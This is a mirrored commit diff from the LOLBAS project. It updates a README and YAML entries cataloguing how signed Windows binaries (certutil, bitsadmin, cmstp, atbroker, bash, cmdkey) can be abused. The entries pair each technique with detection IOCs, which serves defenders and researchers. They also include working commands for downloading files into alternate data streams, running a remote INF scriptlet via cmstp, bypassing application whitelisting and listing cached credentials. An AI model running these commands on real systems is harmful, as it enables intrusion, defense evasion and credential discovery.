mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 14:29:24 +01:00
Update readme, began updating OSBins with new template
This commit is contained in:
parent
e8c7042468
commit
adafa6de3f
55
README.md
55
README.md
@ -17,9 +17,10 @@ Primarily files that offer "extra" functionality.
|
||||
|
||||
## Definition
|
||||
|
||||
* Must be a Microsoft signed file. (OS or downloaded from Microsoft site)
|
||||
* Must be a Microsoft signed file. (Native to the OS or downloaded from Microsoft site)
|
||||
* Only extra "unexpected" functionality is interesting (Not interesting to document what it was intended for)
|
||||
* Exceptions are Application Whitelisting bypasses
|
||||
* Primary focus is stuff that can be leveraged by APT or in Red Teaming
|
||||
|
||||
* Functionality can include:
|
||||
* Executing code
|
||||
@ -48,14 +49,15 @@ We generate the MD files from this and later it will also be the base for an upc
|
||||
|
||||
|
||||
## STORY
|
||||
"Living off the land" was coined by Matt Graeber - @mattifestation <3
|
||||
One of the first "Living Off The Land" talks (That I know of) is this one:
|
||||
"Living off the land" was coined by Christopher Campbell (@obscuresec) & Matt Graeber (@mattifestation)
|
||||
One of the first "Living Off The Land" talks is this one:
|
||||
https://www.youtube.com/watch?v=j-r6UonEkUw
|
||||
|
||||
The term LOLBins came from a twitter discussion on what to call these binaries. It was first proposed by Philip Goh - @MathCasualty here:
|
||||
The term LOLBins came from a twitter discussion on what to call these binaries that can be used by an attacker to perform other actions than what the binary was designed to do.
|
||||
LOLBins was first proposed by Philip Goh (@MathCasualty) here:
|
||||
https://twitter.com/MathCasualty/status/969174982579273728
|
||||
|
||||
The term LOLScripts came from Jimmy - @bohops:
|
||||
The term LOLScripts came from Jimmy (@bohops):
|
||||
https://twitter.com/bohops/status/984828803120881665
|
||||
|
||||
Common hashtags for these files are:
|
||||
@ -71,7 +73,7 @@ A "highly scientific poll" was also conducted to agree (69% yes) on the name LOL
|
||||
https://twitter.com/Oddvarmoe/status/985432848961343488
|
||||
|
||||
The domain http://lolbins.com has been registered by an unknown individual and redirected it to this project. (Thank you)
|
||||
|
||||
The domain http://lolbas-project.com has been registered by Jimmy (@bohops). (Thanks!)
|
||||
The awesome logos in the logo folder was provided by Adam Nadrowski (@_sup_mane) - Thank you so much man!
|
||||
|
||||
Love this logo:
|
||||
@ -82,33 +84,36 @@ Love this logo:
|
||||
All features are added to the issues in this repo.
|
||||
|
||||
### 1.0
|
||||
* Hosted https://github.com/api0cradle/LOLBAS/
|
||||
* Only MD files
|
||||
- [x] Hosted https://github.com/api0cradle/LOLBAS/
|
||||
- [x] Only MD files
|
||||
|
||||
|
||||
### 2.0 -- Current
|
||||
* Hosted here on this repo
|
||||
* Everything converted to YML files
|
||||
* MD files generated from YML files
|
||||
* Clearer definition
|
||||
* Management scripts
|
||||
|
||||
- [x] Moved from api0cradle and hosted here on this repo (https://github.com/LOLBAS-Project/LOLBAS)
|
||||
- [x] Everything converted to YML files
|
||||
- [x] MD files generated from YML files
|
||||
- [x] Clearer definition of a LOLBin
|
||||
- [ ] Management scripts
|
||||
- [x] New template
|
||||
|
||||
|
||||
### 2.1
|
||||
* More categories
|
||||
* Jekyll frontend
|
||||
* Privileges required
|
||||
- [ ] Migration to new template
|
||||
- [ ] More categories - Part of the new template
|
||||
- [ ] ATT&CK Mitre mapping
|
||||
- [ ] Privileges required by binary
|
||||
- [ ] Jekyll frontend
|
||||
|
||||
|
||||
|
||||
### 2.2
|
||||
* ATT&CK Mitre mapping
|
||||
* LOLBIN GUID - Unique ID for each bin
|
||||
* Sub-Categories
|
||||
* Signed executing unsigned
|
||||
* Signed executing signed
|
||||
* Split commands into command, argument structure, and example. i.e. Command: cmstp.exe; ArgStructure: /ini /s <inf_file>; Example: cmstp.exe /ini /s c:\cmstp\CorpVPN.inf
|
||||
- [ ] LOLBIN GUID - Unique ID for each bin
|
||||
- [ ]Sub-Categories
|
||||
- [ ] Signed executing unsigned
|
||||
- [ ] Signed executing signed
|
||||
- [ ] Split commands into command, argument structure, and example. i.e. Command: cmstp.exe; ArgStructure: /ini /s <inf_file>; Example: cmstp.exe /ini /s c:\cmstp\CorpVPN.inf
|
||||
|
||||
|
||||
### 2.3
|
||||
* Tests for PRs to ensure fields are valid
|
||||
* Provide the project in DB format (sqlite)
|
||||
- [ ] Tests for PRs to ensure fields are valid
|
||||
- [ ]Provide the project in DB format (sqlite)
|
@ -1,20 +1,29 @@
|
||||
---
|
||||
Name: Atbroker.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Description: Helper binary for Assistive Technology (AT)
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: ATBroker.exe /start malware
|
||||
Description: Start a registered Assistive Technology (AT).
|
||||
Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- C:\Windows\System32\Atbroker.exe
|
||||
- C:\Windows\SysWOW64\Atbroker.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- path: C:\Windows\System32\Atbroker.exe
|
||||
- path: C:\Windows\SysWOW64\Atbroker.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
|
||||
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
|
||||
- IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware
|
||||
Resources:
|
||||
- http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
|
||||
Notes: >
|
||||
Thanks to Adam - @hexacorn
|
||||
Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry.
|
||||
|
||||
- Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
|
||||
Acknowledgement:
|
||||
- Person: Adam
|
||||
Handle: '@hexacorn'
|
||||
---
|
@ -1,17 +1,35 @@
|
||||
---
|
||||
Name: Bash.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Description: File used by Windows subsystem for Linux
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: bash.exe -c calc.exe
|
||||
Description: Execute calc.exe.
|
||||
Description: Executes calc.exe from bash.exe
|
||||
Usecase: Performs execution of specified file, can be used as a defensive evasion.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 10
|
||||
- Command: bash.exe -c calc.exe
|
||||
Description: Executes calc.exe from bash.exe
|
||||
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 10
|
||||
Full Path:
|
||||
- '?'
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- path: C:\Windows\System32\bash.exe
|
||||
- path: C:\Windows\SysWOW64\bash.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Child process from bash.exe
|
||||
Resources:
|
||||
- ''
|
||||
Notes: Thanks to ?
|
||||
|
||||
- Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||
Acknowledgement:
|
||||
- Person: Alex Ionescu
|
||||
Handle: '@aionescu'
|
||||
---
|
@ -1,36 +1,59 @@
|
||||
---
|
||||
Name: Bitsadmin.exe
|
||||
Description: Execute, Download, Copy, Read ADS
|
||||
Author: ''
|
||||
Name: bitsadmin.exe
|
||||
Description: Used for managing background intelligent transfer
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: |
|
||||
bitsadmin /create 1
|
||||
bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe
|
||||
bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL
|
||||
bitsadmin /RESUME 1
|
||||
bitsadmin /complete 1
|
||||
- Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
|
||||
- Command: |
|
||||
bitsadmin /create 1
|
||||
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
|
||||
bitsadmin /RESUME 1
|
||||
bitsadmin /complete 1
|
||||
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
|
||||
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
|
||||
Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique.
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
|
||||
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
|
||||
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
|
||||
Description: One-liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
|
||||
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
|
||||
Description: One-Liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
|
||||
Usecase: Download file from Internet
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
|
||||
Description: Command for copying cmd.exe to another folder
|
||||
Usecase: Copy file
|
||||
Category: Copy
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
|
||||
Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
|
||||
Usecase: Execute binary file specified. Can be used as a defensive evasion.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- c:\Windows\System32\bitsadmin.exe
|
||||
- c:\Windows\SysWOW64\bitsadmin.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- path: C:\Windows\System32\bitsadmin.exe
|
||||
- path: C:\Windows\SysWOW64\bitsadmin.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Child process from bitsadmin.exe
|
||||
- IOC: bitsadmin creates new files
|
||||
- IOC: bitsadmin adds data to alternate data stream
|
||||
Resources:
|
||||
- https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679
|
||||
- Slide 53
|
||||
- https://www.youtube.com/watch?v=_8xJaaQlpBo
|
||||
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
Notes: Thanks to Rob Fuller - @mubix , Chris Gates - @carnal0wnage, Oddvar Moe - @oddvarmoe
|
||||
|
||||
- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53
|
||||
- Link: https://www.youtube.com/watch?v=_8xJaaQlpBo
|
||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||
Acknowledgement:
|
||||
- Person: Rob Fuller
|
||||
Handle: '@mubix'
|
||||
- Person: Chris Gates
|
||||
Handle: '@carnal0wnage'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
@ -1,25 +1,56 @@
|
||||
---
|
||||
Name: Certutil.exe
|
||||
Description: Download, Add ADS, Decode, Encode
|
||||
Author: ''
|
||||
Description: Windows binary used for handeling certificates
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
|
||||
Description: Download and save 7zip to disk in the current folder.
|
||||
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
|
||||
Usecase: Download file from Internet
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
|
||||
Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
|
||||
- Command: |
|
||||
certutil -encode inputFileName encodedOutputFileName
|
||||
certutil -decode encodedInputFileName decodedOutputFileName
|
||||
Description: Commands to encode and decode a file using Base64.
|
||||
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: certutil -encode inputFileName encodedOutputFileName
|
||||
Description: Command to encode a file using Base64
|
||||
Usecase: Encode files to evade defensive measures
|
||||
Category: Encode
|
||||
Privileges: User
|
||||
MitreID: T1027
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1027
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: certutil -decode encodedInputFileName decodedOutputFileName
|
||||
Description: Command to decode a Base64 encoded file.
|
||||
Usecase: Decode files to evade defensive measures
|
||||
Category: Decode
|
||||
Privileges: User
|
||||
MitreID: T1140
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- c:\windows\system32\certutil.exe
|
||||
- c:\windows\sysWOW64\certutil.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- path: C:\Windows\System32\certutil.exe
|
||||
- path: C:\Windows\SysWOW64\certutil.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Certutil.exe creating new files on disk
|
||||
- IOC: Useragent Microsoft-CryptoAPI/10.0
|
||||
- IOC: Useragent CertUtil URL Agent
|
||||
Resources:
|
||||
- https://twitter.com/Moriarty_Meng/status/984380793383370752
|
||||
- https://twitter.com/mattifestation/status/620107926288515072
|
||||
Notes: Thanks to Matt Graeber - @mattifestation, Moriarty - @Moriarty2016
|
||||
|
||||
- Link: https://twitter.com/Moriarty_Meng/status/984380793383370752
|
||||
- Link: https://twitter.com/mattifestation/status/620107926288515072
|
||||
Acknowledgement:
|
||||
- Person: Matt Graeber
|
||||
Handle: '@mattifestation'
|
||||
- Person: Moriarty
|
||||
Handle: '@moriarty2016'
|
||||
---
|
||||
|
@ -1,18 +1,28 @@
|
||||
---
|
||||
Name: Cmdkey.exe
|
||||
Description: Credentials
|
||||
Author: ''
|
||||
Name: Cmdkey.exe
|
||||
Description: creates, lists, and deletes stored user names and passwords or credentials.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: cmdkey /list
|
||||
Description: List cached credentials.
|
||||
Description: List cached credentials
|
||||
Usecase: Get credential information from host
|
||||
Category: Credentials
|
||||
Privileges: User
|
||||
MitreID: T1078
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1078
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- c:\windows\system32\cmdkey.exe
|
||||
- c:\windows\sysWOW64\cmdkey.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- path: C:\Windows\System32\cmdkey.exe
|
||||
- path: C:\Windows\SysWOW64\cmdkey.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Usage of this command could be and IOC
|
||||
Resources:
|
||||
- https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
|
||||
Notes: ''
|
||||
|
||||
- Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
|
||||
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
@ -1,26 +1,43 @@
|
||||
---
|
||||
Name: Cmstp.exe
|
||||
Description: Execute, UACBypass
|
||||
Author: ''
|
||||
Description: Installs or removes a Connection Manager service profile.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
|
||||
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
||||
Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1191
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1191
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
|
||||
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
|
||||
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
|
||||
Category: AwL bypass
|
||||
Privileges: User
|
||||
MitreID: T1191
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1191
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- C:\Windows\system32\cmstp.exe
|
||||
- C:\Windows\sysWOW64\cmstp.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- path: C:\Windows\System32\cmstp.exe
|
||||
- path: C:\Windows\SysWOW64\cmstp.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Execution of cmstp.exe should not be normal unless VPN is in use
|
||||
- IOC: Cmstp.exe communication towards internet and getting files
|
||||
Resources:
|
||||
- https://twitter.com/NickTyrer/status/958450014111633408
|
||||
- https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
|
||||
- https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
|
||||
- https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
|
||||
- https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1
|
||||
(UAC Bypass)
|
||||
- https://github.com/hfiref0x/UACME
|
||||
Notes: Thanks to Oddvar Moe - @oddvarmoe, Nick Tyrer - @NickTyrer
|
||||
|
||||
- Link: https://twitter.com/NickTyrer/status/958450014111633408
|
||||
- Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
|
||||
- Link: https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
|
||||
- Link: https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
|
||||
- Link: https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1
|
||||
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
- Person: Nick Tyrer
|
||||
Handle: '@NickTyrer'
|
||||
---
|
Loading…
Reference in New Issue
Block a user